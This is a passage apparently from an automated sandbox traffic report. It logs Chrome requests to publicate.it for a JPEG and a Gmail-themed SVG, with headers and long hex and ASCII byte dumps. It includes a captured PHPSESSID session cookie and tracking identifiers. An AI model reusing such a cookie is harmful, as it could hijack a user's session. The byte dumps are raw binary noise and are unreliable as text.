                                                                                                                                                                                                        Data Ascii: 5_Z[F>h;TZGZRsl]Q!3.-+Ihg!d6\4-c2`%d$EfNn_:*^Y,nZ0S*-1<oXA,"3m;){l$;j>HWwbJ##N.u)Z*/
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: d2 07 31 69 04 1f 68 58 4c 46 7a fc 67 11 9a be be 2b d4 cc 6e f3 15 38 89 a7 ff 00 4b 40 03 82 fd 20 e4 cd e8 8e 09 c9 9b d1 1c 14 5d 22 5a 6f 76 7e 6e 47 45 50 f7 b6 38 69 a7 92 47 1b 06 b6 27 12 4f 55 82 fb 2f f8 63 c9 0c 47 25 32 1e 77 63 30 ba 9e af 11 a9 e5 3a 07 8b 3a 36 06 86 b7 38 73 13 62 6d cd 70 ba cb 69 c0 20 86 80 7b 15 cc 6c cd 46 c2 8d 8a 83 62 22 28 2c 11 11 00 44 44 01 11 10 04 44 40 59 c3 e6 99 d8 a6 a1 0f 9a 67 62 9a b9 42 70 f9 5e c5 59 51 87 ca f6 2a ca ac b2 08 88 a0 92 14 fe 62 3f 54 2c 3e 5a e1 d5 18 b6 4c d7 50 d1 86 9a 89 5a d0 c0 e7 66 8d 4e 07 6f b1 66 29 fc c4 7e a8 53 56 84 9c 24 a4 bc 0a ce 0a 71 71 7b 33 46 af c8 f9 f1 0c 8f c2 29 0c ad a7 c5 b0 f8 da 62 90 1b b4 38 0d 62 e3 9b 50 d7 d4 15 8d 76 1d 96 f8 e5 20 c3 31 13 43
                                                                                                                                                                                                        Data Ascii: 1ihXLFzg+n8K@ ]"Zov~nGEP8iG'OU/cG%2wc0::68sbmpi {lFb"(,DDD@YgbBp^YQ*b?T,>ZLPZfNof)~SV$qq{3F)b8bPv 1C
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 76 3f d6 2a 6a 10 ec 7f ac 54 d7 13 b8 51 97 c8 2a 4a 32 f9 05 10 65 04 44 57 28 19 e7 d9 d8 7f 65 72 ad 99 e7 d9 d8 7f 65 72 aa f7 2c b6 08 88 a0 90 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 2c e1 f3 4c ec 53 50 87 cd 33 b1 4d 5c a1 38 7c af 62 ac a8 c3 e5 7b 15 65 56 59 04 44 50 49 45 8d 32 b4 3d ee 77 8d ac 00 48 00 29 68 5b bd fe f9 ef 4a 7f 31 1f aa 15 44 05 3d 0b 77 bf df 3d e9 a1 6e f7 fb e7 bd 54 44 05 3d 0b 77 bf df 3d e9 a1 6e f7 fb e7 bd 54 44 05 3d 0b 77 bf df 3d e9 a1 6e f7 fb e7 bd 54 44 05 19 1a 62 69 7b 1c ed 5a c8 24 90 42 ac a1 3f 98 93 d5 3f 25 31 b0 20 21 37 99 7f aa 54 c6 c0 a1 37 99 7f aa 54 c6 c0 80 21 36 51 91 ed 8d 8e 7b cd 9a d1 72 56 b1 8a e2 a5 ed 7b e4 93 45 4e de 62 7e 6b a5 3a 6e 6e c8 e7 52 a2 a6 ae cc e5 46 29 47 03
                                                                                                                                                                                                        Data Ascii: v?*jTQ*J2eDW(erer," """ ,LSP3M\8|b{eVYDPIE2=wH)h[J1D=w=nTD=w=nTD=w=nTDbi{Z$B??%1 !7T7T!6Q{rV{ENb~k:nnRF)G
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: d6 3a 49 43 1e d6 d8 f3 85 7a a8 c5 4d 14 6e ce 68 37 de 4a ac a0 94 11 11 09 21 0e c7 fa c5 4d 42 1d 8f f5 8a 9a 00 a3 2f 90 54 94 65 f2 0a 20 ca 08 88 ae 50 33 cf b3 b0 fe ca e5 5b 33 cf b3 b0 fe ca e5 55 ee 59 6c 11 11 41 21 11 10 04 44 40 11 11 00 44 44 01 11 10 04 44 40 59 c3 e6 99 d8 a6 a1 0f 9a 67 62 9a b9 42 70 f9 5e c5 59 51 87 ca f6 2a ca ac b2 08 88 a0 92 14 fe 62 3f 54 29 a8 53 f9 88 fd 50 a6 50 18 fa ec 67 0d a0 98 45 5b 5f 4b 04 a7 63 24 94 34 f0 57 b1 c8 c9 23 6b e3 7b 5e c7 0b 87 34 dc 11 bc 15 cd 71 cc 27 27 b2 6d d5 55 39 48 66 c4 ea f1 07 3d f1 b9 d1 9b 8b 6d 00 83 61 b4 6b 55 72 5b 0e c4 4f 82 da c8 23 99 ac 9a 76 c8 f8 3e d4 59 8c 36 d5 9d b0 5e ce ec bf 32 db 2c 34 32 29 c6 5e 29 5d ad 1f ed fb 18 23 8a 9f 11 c2 51 5b 37 64 f5 5f bf
                                                                                                                                                                                                        Data Ascii: :ICzMnh7J!MB/Te P3[3UYlA!D@DDD@YgbBp^YQ*b?T)SPPgE[_Kc$4W#k{^4q''mU9Hf=makUr[O#v>Y6^2,42)^)]#Q[7d_


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        115192.168.2.549900104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC703OUTGET /images/nhph4-p-500.jpg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC750INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:25 GMT
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 23952
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "5d90-620aa1d1f9aaa"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKCzY3Bs5YGVp5tv73p6OmpofrbMr%2FDi8W7kYoXbcnjDJpf5Sxy%2BA0cc8SlBPpyElXH7UmLn3d8ZIbQzIXe%2FbupBAV0e1ZrkjYF48YLy8I0vVa5W2oiQBUA4OCX%2Fug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615d13de8c402-EWR
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC619INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 01 c1 01 f4 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 03 01 02 04 05 06 07 08 09 ff c4 00 4f 10 00 01 03 02 01 04 0d 08 08 04 04 05 05 01 01 00 01 00 02 03 04 11 05 06 12 21 31 13 14 16 32 41 51 52 55 61 71 92 93 d1 07 22 53 54 81 91 a1 b1 15 33 35 42 43 74 94 a2 23 73 b2 c1
                                                                                                                                                                                                        Data Ascii: C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("O!12AQRUaq"ST35BCt#s
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 15 0c 6e 82 e8 d8 48 07 ad 25 0a 51 57 92 4b 80 8d 4a d2 76 8b 6f 89 2e e8 71 8e 75 ad ef 8a 6e 87 18 e7 5a de f8 ac 0a 88 25 a6 99 f0 d4 44 f8 a5 61 b3 98 f6 96 91 d6 0a 8d 4a a5 4d eb 51 44 3a d5 56 a7 27 c5 9b 3d d0 e3 1c eb 5b df 14 dd 0e 31 ce b5 bd f1 5a e8 a3 7c d2 36 38 98 e7 c8 e3 66 b5 a2 e4 9e 80 b3 ab f0 4c 53 0f 84 4d 5d 87 d5 41 11 fb f2 46 40 f7 f0 28 70 a2 9d 9a 57 f9 16 55 2b 35 74 dd be 65 fb a1 c6 39 d6 b7 be 29 ba 1c 63 9d 6b 7b e2 b5 88 a7 45 4f 75 70 2b a6 a9 bc f8 9b 3d d0 e3 1c eb 5b df 14 dd 0e 31 ce b5 bd f1 5a c4 4d 15 3d d5 c0 69 aa 6f 3e 26 cf 74 38 c7 3a d6 f7 c5 37 43 8c 73 ad 6f 7c 56 b1 13 45 4f 75 70 1a 6a 9b cf 89 b3 dd 0e 31 ce b5 bd f1 4d d0 e3 1c eb 5b df 15 ac 44 d1 53 dd 5c 06 9a a6 f3 e2 6c f7 43 8c 73 ad 6f 7c 53
                                                                                                                                                                                                        Data Ascii: nH%QWKJvo.qunZ%DaJMQD:V'=[1Z|68fLSM]AF@(pWU+5te9)ck{EOup+=[1ZM=io>&t8:7Cso|VEOupj1M[DS\lCso|S
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 82 22 29 20 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 0f 7a f2 65 56 ea 9c 8d a2 ce 24 98 f3 a2 b9 ff 00 b4 d9 16 2f 92 51 ff 00 c3 61 fe 74 9f d4 8b c7 62 a2 95 69 af 8b 3d b6 12 4d d0 83 7d 48 f2 2c a8 ff 00 12 62 9f 99 93 fa 96 b1 7d 0e 30 2c 26 71 b2 cd 86 d1 c9 2b fc e7 3d d1 02 5c 4f 09 2a bb 9c c1 79 a6 87 b9 6a eb c3 95 a1 18 a8 e5 d8 71 aa 72 3c e5 27 2c cb 59 f3 ba 2f a2 37 39 82 f3 4d 0f 72 d4 dc e6 0b cd 34 3d cb 55 b9 e2 1b ac a7 32 cf 79 1f 3b a2 fa 23 73 98 2f 34 d0 f7 2d 4d ce 60 bc d3 43 dc b5 39 e2 1b ac 73 2c f7 91 f3 b2 aa fa 23 73 98 2f 34 d0 f7 2d 4d ce 60 bc d3 43 dc b5 39 e2 1b ac 73 2c f7 91 f3
                                                                                                                                                                                                        Data Ascii: ") """ """ """ """ """ ""zeV$/Qatbi=M}H,b}0,&q+=\O*yjqr<',Y/79Mr4=U2y;#s/4-M`C9s,#s/4-M`C9s,
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 3a 25 c6 52 0c d7 71 14 cd 77 11 53 a2 5c 65 20 cd 77 11 4c d7 71 15 3a 25 c6 52 0c d7 71 14 cd 77 11 53 a2 5c 65 20 cd 77 11 4c d7 71 15 3a 25 c6 52 0c d7 71 14 cd 77 11 53 a2 5c 65 20 cd 77 11 4c d7 71 15 3a 25 c6 52 0c d7 71 14 cd 77 11 53 a2 5c 65 20 cd 77 11 4c d7 71 15 3a 25 c6 52 0c d7 71 15 4c d3 c4 56 42 25 c6 53 19 16 41 68 3a c2 89 ec cd d2 35 29 4c 34 58 88 8a 48 08 88 80 87 f1 1f d6 3e 41 13 f1 1f d6 3e 41 14 32 c5 d4 ff 00 51 1f 52 91 47 4f f5 11 f5 29 14 95 0a ac 19 ce b2 a2 96 11 ac a3 08 90 0b 0d 08 88 a8 5c 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 2c 69 2b 63 63 cb 6c e7 11 ae c8 0c 94 58 9b 7e 3e 43 fe 09 b7 e3 e4 3f e0 a6 c4 5d 19 68 b1 36 fc 7c 87 fc 13 6f c7 c8 7f c1 2c 2e 8c b4 58 9b 7e 3e 43 fe 09 b7 e3
                                                                                                                                                                                                        Data Ascii: :%RqwS\e wLq:%RqwS\e wLq:%RqwS\e wLq:%RqwS\e wLq:%RqLVB%SAh:5)L4XH>A>A2QRGO)\""" """ ",i+cclX~>C?]h6|o,.X~>C
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 94 bd b5 8b b3 e1 dc d7 07 61 be 09 b3 e1 dc d7 07 61 be 09 a3 c5 76 78 3f 31 a4 c2 76 b8 af 23 2b 75 58 1f 3a 52 f6 d3 75 58 1f 3a 52 f6 d6 2e cf 87 73 5c 1d 86 f8 26 cf 87 73 5c 1d 86 78 26 8f 17 d9 e0 fc c6 93 09 da e2 bc 8c ad d5 60 7c e9 4b db 4d d5 60 7c e9 4b db 58 9b 3e 1d cd 70 76 1b e0 9b 3e 1d cd 70 76 1b e0 9a 3c 5f 67 83 f3 1a 4c 27 6b 8a f2 32 f7 55 81 f3 a5 2f 6d 37 55 81 f3 a5 2f 6d 62 6d 8c 3b 9a e0 ec 37 c1 53 6c 61 dc d7 07 61 be 09 a3 c5 f6 78 3f 31 a4 c2 76 b8 af 23 33 75 58 1f 3a 52 f6 d3 75 58 1f 3a 52 f6 d6 1e d8 c3 b9 ae 0e c3 3c 13 6c e1 dc d7 07 61 9e 09 a2 c5 f6 7c 7c c6 93 09 da e2 bc 8c cd d5 60 7c e9 4b db 4d d5 60 7c e9 4b db 58 5b 67 0e e6 b8 7b 0c f0 4d b5 87 73 54 1d 86 78 26 8b 17 d9 f1 f3 1a 5c 27 6b 8a f2 33 77 55 81
                                                                                                                                                                                                        Data Ascii: aavx?1v#+uX:RuX:R.s\&s\x&`|KM`|KX>pv>pv<_gL'k2U/m7U/mbm;7Slaax?1v#3uX:RuX:R<la||`|KM`|KX[g{MsTx&\'k3wU
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: b4 6b 09 99 8c a8 b2 c9 65 48 9d 9f 13 5d 7d 27 5a bf 85 4d ca e5 2d b2 59 5c a9 75 37 19 4a 59 2c ab a4 a5 92 e4 65 2d b2 59 57 5a a6 84 b8 ca 50 85 4b 2b b5 ea 42 08 29 71 94 b6 c9 65 55 4d 27 52 9c c3 29 4b 2a 59 5c 75 d9 52 fa 52 e4 65 2d b2 a1 0a fe 0d 25 51 c4 5b 42 66 19 4b 2c a9 65 50 6f ad 09 17 2a 6e 46 52 c2 15 2c ae ba a1 4c c3 21 69 0a d2 15 c5 51 4d c8 ca 5a 42 a1 0a e5 42 52 e4 65 2d b2 b4 85 71 2a 84 a9 b8 ca 6c f2 64 5a ba 4f e5 ff 00 70 ab 90 3f 65 d6 7e 7a 6f 9a 64 df fc f4 9f cb fe e1 32 07 ec ba cf cf 4d f3 5c fa fe f1 0e e7 f8 37 e8 2b 61 a7 de bf 27 4c 88 8b 60 d7 08 88 80 22 22 02 d9 77 85 40 a7 97 78 54 0a d1 2a c2 22 29 20 87 f1 1f d6 3e 41 13 f1 1f d6 3e 41 14 32 c5 d4 ff 00 51 1f 52 91 47 4f f5 11 f5 29 14 95 0a 68 77 9e d5 0a
                                                                                                                                                                                                        Data Ascii: keH]}'ZM-Y\u7JY,e-YWZPK+B)qeUM'R)K*Y\uRRe-%Q[BfK,ePo*nFR,L!iQMZBBRe-q*ldZOp?e~zod2M\7+a'L`""w@xT*") >A>A2QRGO)hw
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 77 01 72 48 d3 75 49 34 5a 37 2f 89 8d 82 30 35 d8 68 e8 58 d2 c8 eb 9d 3a 38 16 64 ba 6c 0e a2 15 81 8c 6e 9c dd 21 63 2e 62 c4 e3 33 f3 4b c3 6c 34 82 34 dd 64 6c 67 41 cf 37 ea 47 4a 18 6e 7d eb 16 5a c0 09 03 52 92 0a cf 0b de d0 2e d7 74 5e cb 0f 61 7e cb 60 d2 2d c2 a5 a6 ae 6b 66 21 fa ae b2 df 33 5a d7 38 96 96 8d 4a c9 b5 a8 ab 49 91 b6 50 00 0e 36 b7 02 8e 79 de d6 dd 8d b8 e1 b2 9a 0a 98 a6 03 63 b5 c8 b2 a1 74 79 af 60 b0 68 d7 a1 54 b1 ac 38 8d a4 f3 cd 88 e2 58 b5 18 a4 b2 68 6f 98 05 ed 64 ab 63 04 ae cc 21 cd e3 e2 58 f9 c0 8b 10 b3 28 ad a6 27 27 b0 b6 4a 82 fc d2 fd f0 e1 59 11 56 10 dc d2 33 9b c4 a1 8a 95 d3 b8 88 d9 9e 47 00 59 83 0e 2c 95 91 cc 59 62 2e 6c 75 29 79 48 8e 63 06 4a 87 cd 2d 9a db 34 6a 1a 96 c5 91 c6 fa 7d 20 ec 80 6b
                                                                                                                                                                                                        Data Ascii: wrHuI4Z7/05hX:8dln!c.b3Kl44dlgA7GJn}ZR.t^a~`-kf!3Z8JIP6ycty`hT8Xhodc!X(''JYV3GY,Yb.lu)yHcJ-4j} k
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 96 96 87 31 c7 4f 18 56 6a cb 51 09 dd eb 3b 78 61 8e 06 e6 c2 c0 38 2f 6d 6b 16 b2 18 dd 23 49 70 07 84 1e 15 7c 35 4c a8 80 4d 1b bc c2 34 ac 63 24 73 4c 2e e3 60 b5 ba 4d 83 01 d4 d5 7e 76 6c 37 be a2 0e 85 8d 51 15 63 1b fc 48 9d 66 f0 8d 21 74 21 cd be 8b fb 55 49 61 3a ec 6d a9 59 4f e0 55 c2 fd 27 1e f9 8f 59 50 ba 67 e7 02 db 82 3a 56 ee ba 92 09 aa 4d 9f 98 e3 af cd d0 b5 86 86 72 f0 23 cd 79 bd 85 96 78 ca 2c c1 28 c9 1b 8a 26 3e 7a 08 de 5f e7 b8 59 da 55 5c e6 c4 d3 e6 b3 3c 68 d5 ac 25 15 3c f4 90 3d 93 96 5d c7 40 1f 35 4a b6 30 c7 e6 bb 49 d0 56 07 b4 ce b6 1a 96 b9 95 55 84 17 06 34 9e 15 b6 d9 21 a6 63 1b 4f 6b e7 69 d3 7b ae 7a b6 07 53 58 93 ac db 46 a5 6b 23 9f 45 a2 93 8f 7a b3 38 a9 74 98 54 9c 5e cd 67 4d 79 66 05 c3 e6 a3 32 08 5e
                                                                                                                                                                                                        Data Ascii: 1OVjQ;xa8/mk#Ip|5LM4c$sL.`M~vl7QcHf!t!UIa:mYOU'YPg:VMr#yx,(&>z_YU\<h%<=]@5J0IVU4!cOki{zSXFk#Ez8tT^gMyf2^
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 02 22 20 2d 97 78 54 0a 79 77 85 40 ad 12 ac 22 22 92 08 7f 11 fd 63 e4 11 3f 11 fd 63 e4 11 43 2c 5d 4f f5 11 f5 29 14 74 ff 00 51 1f 52 91 49 50 a6 87 79 ed 50 a9 a1 de 7b 54 32 51 7a b1 ea f5 64 82 e1 54 b1 c3 e4 d6 23 4b 87 56 63 54 d5 75 0c 8a 5d ba f7 86 b8 e9 70 3c 2b 77 36 2d 49 2c 5f c2 9b 38 91 76 e6 dd 73 f8 b5 1c 14 59 6d 1d 4d 43 18 22 ae 8f 35 92 39 b7 cc 90 5a e3 a2 f6 1e f5 89 8e 99 22 98 1a 70 27 04 00 03 24 03 63 e9 b1 d6 56 9e 11 b8 c1 d3 e9 8b 6b f2 bc 0d ec 5c 73 cd 54 e8 92 4f c2 cf c4 f2 af f8 81 c4 b3 f0 ca 16 56 cd 0b eb a3 98 e6 08 f5 b1 87 80 fc 16 1f 92 97 45 5b a2 47 41 24 52 b7 ce 8a 51 76 b8 2f 3d ca ea 59 6a f1 1c 56 19 64 7b 9c ea a9 b4 93 72 0e 71 b5 bd c1 6a bc 9f 53 54 62 72 d5 61 92 d5 54 c5 51 01 ce 8e 38 64 cc 2e 37
                                                                                                                                                                                                        Data Ascii: " -xTyw@""c?cC,]O)tQRIPyP{T2QzdT#KVcTu]p<+w6-I,_8vsYmMC"59Z"p'$cVk\sTOVE[GA$RQv/=YjVd{rqjSTbraTQ8d.7
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC1369INData Raw: 38 68 ec 9b fa 7d 49 66 c2 6b 64 6d b3 e0 bf fb bc 16 34 19 3b 56 5e ed 9e a2 20 c3 c8 04 9f 8a 93 71 94 1e b5 89 7e a9 c9 b8 cc 3f d6 b1 2f d5 39 57 49 5f 71 71 f4 2d 92 86 fb fa 7d 4b b1 1a da 2c 9b c3 b6 bd 28 0f ab 7e 88 60 66 97 c8 f3 a8 90 16 6e 4b 61 af c2 b0 58 29 e6 37 9c de 49 48 e5 b8 dc f8 2a e1 39 3d 86 e1 72 19 69 69 ff 00 8e 74 19 64 71 7b fd e5 6d 92 9d 39 b9 e9 2a ed e8 5d 44 54 a9 05 0d 1d 2d 9b 5b 7d 3f 20 88 8b 64 d6 08 88 80 22 22 02 d9 77 85 40 a7 97 78 54 0a d1 2a c2 22 29 20 87 f1 1f d6 3e 41 13 f1 1f d6 3e 41 14 32 c5 d4 ff 00 51 1f 52 91 47 4f f5 11 f5 29 14 95 0a 68 77 9e d5 0a 9a 1d e7 b5 43 25 17 aa 38 5c 2a a2 a9 63 4b 94 38 54 78 b6 1e fa 79 0e 63 af 9d 1c 83 5b 1c 35 15 c1 57 cd 51 33 dd 43 8b d3 d3 1a f8 85 81 93 cc d9 47
                                                                                                                                                                                                        Data Ascii: 8h}Ifkdm4;V^ q~?/9WI_qq-}K,(~`fnKaX)7IH*9=riitdq{m9*]DT-[}? d""w@xT*") >A>A2QRGO)hwC%8\*cK8Txyc[5WQ3CG


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        116192.168.2.549901104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:25 UTC704OUTGET /images/gmail_client.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC759INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:26 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 3140
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "c44-620aa1d18c4a4"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ufy%2Bz7zTBlo0Xyxxg5oQJ1UpCJD%2B94LurmroJ7%2F0Ya%2BKhYMmqndHAnlgH%2BRSd7HHWLo02945DFLc7Hm%2FDRScrt%2BOcNoEjjTXW7BeDK53CYbD1GJlKhJKW%2FT9LNcLOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615d22d82c407-EWR
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC610INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 33 36 70 78 22 20 68 65 69 67 68 74 3d 22 31 33 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 36 20 31 33 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 32 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 39 2e 32 31 38 37 35 2c 30 20 4c 31 30 38 2e 37 38
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>2</title> <defs> <path d="M9.21875,0 L108.78
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 20 20 20 20 3c 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 20 72 61 64 69 75 73 3d 22 30 2e 35 22 20 6f 70 65 72 61 74 6f 72 3d 22 64 69 6c 61 74 65 22 20 69 6e 3d 22 53 6f 75 72 63 65 41 6c 70 68 61 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4f 66 66 73 65 74 20 64 78 3d 22 30 22 20 64 79 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 4f 66 66 73 65 74 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4f 66 66 73 65 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 34 22 20
                                                                                                                                                                                                        Data Ascii: <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology> <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset> <feGaussianBlur stdDeviation="4"
